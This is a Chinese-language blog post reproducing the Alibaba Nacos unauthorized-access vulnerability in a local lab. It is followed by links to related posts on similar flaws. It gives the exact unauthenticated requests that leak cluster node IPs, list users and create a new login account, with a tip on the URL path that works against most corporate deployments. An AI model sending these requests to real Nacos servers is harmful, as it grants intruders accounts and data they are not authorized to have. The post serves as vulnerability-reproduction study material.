【漏洞复现】Nacos未授权访问
漏洞背景
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
漏洞复现
本地搭建
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1
wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone
然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos
前端访问一下地址试试是否存在未授权访问漏洞
http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)
我们试下访问用户列表
为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users
因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在
v1/auth/users?pageNo=1&pageSize=9
可以看能够前端未授权访问用户列表
还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息
那么我们直接简化请求下尝试创建一个用户
POST /v1/auth/users?username=ttt&password=ttt
成功创建
尝试登录
成功登录
【漏洞复现】Nacos未授权访问相关推荐
- 漏洞复现-rides未授权访问
漏洞复现-rides未授权访问 0x00 环境准备 达成效果:不知道密码的情况下,远程ssh连接靶机 达成条件: # 1.关闭rides受保护模式 vim /etc/redis/6379.conf 注 ...
- 漏洞复现 - - - Springboot未授权访问
目录 一, 未授权访问是什么? 二,Actuator介绍 三,怎么进行漏洞发现呢? 四,实验环境 五,漏洞复现 1.通过访问env获取全部环境属性 2.通过/trace提供基本的http请求跟踪信息 ...
- 2022-10-08(Discuz漏洞、FCKeditor文本编辑器漏洞、ZooKeeper 未授权访问、Memcahe 未授权访问)
文章目录 Discuz漏洞-请求报文中含有恶意的PHP代码(CVE-2019-13956) FCKeditor文本编辑器漏洞 test.html browser.html fckeditor.html ...
- Nacos 未授权访问漏洞
漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 .通过该漏洞,攻击者可以进 ...
- nacos未授权访问漏洞【原理扫描】
解决方案 vim /nacos/conf/application.properties 添加 #开启认证配置 nacos.core.auth.enabled=true
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- Atlassian Crowd 未授权访问漏洞
简介 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品.Atlassian Crowd是一套基于Web的单点登录系统.该系 ...
最新文章
- HDU2544 最短路(模版题dijkstra/floyd/spfa)
- java mysql框架_盘点 Java 数据库访问框架——究竟哪个更适合你
- C# 创建网站 无法启动与停止的问题
- 什么是真正的架构设计?
- 解决MongoDB Compass
- 【PHP】网站防止QQ拦截防红跳转代码
- jvisualvm性能监控
- html无序列表只能横着排吗,[三地连线走势图]css 怎样让无序列表 横着排列
- 类查找android中跨项目的数据库操作ContentProvider的使用
- word2010 同时打开多个文档的解决办法
- 白话浅谈——组播那点事
- 【国象AI】总结 + 参考资料
- MFC对话框动态背景(定时器)
- 如何测试硬盘软件,如何进行硬盘测试?磁盘健康检测方法介绍
- (一百三十五)Android O探索WLAN扫描(WIFI SCAN ALWAYS)
- 使用EasyExcel将本地excel数据读取后导入mysql数据库中
- 跟我学spring security系列文章第一章 实现一个基本的登入
- 推荐系统中的biasdebias(一):bias的成因、类型和影响
- selenium中拖动鼠标通过滑动验证码(geetest)验证
- MySQL分库分表设计
热门文章
- 将视频放到网页上续 RM VS ASF
- 转吴小龙的 mvp Android MVP 实例
- 考思科认证需要准备什么?
- Python提取ABAQUS结果数据
- ibm服务器安装2008系统蓝屏,WIN sever 2008 R2 64位系统 ntoskrnl.exe 蓝屏 求解决方案
- js 实现拷贝页面文本数据时,给文本结尾添加文本的出处”p这段文本来自我的js练习/p”。
- java企业微信发送语言_java微信企业号开发之发送消息(文本、图片、语音)
- 黄阶低级 - 《 Java 核心》- 5.1 类、超类和子类(三) - 修改 1 次
- 一文了解互联网中的产品经理
- Altium Designer 在丝印层绘制Logo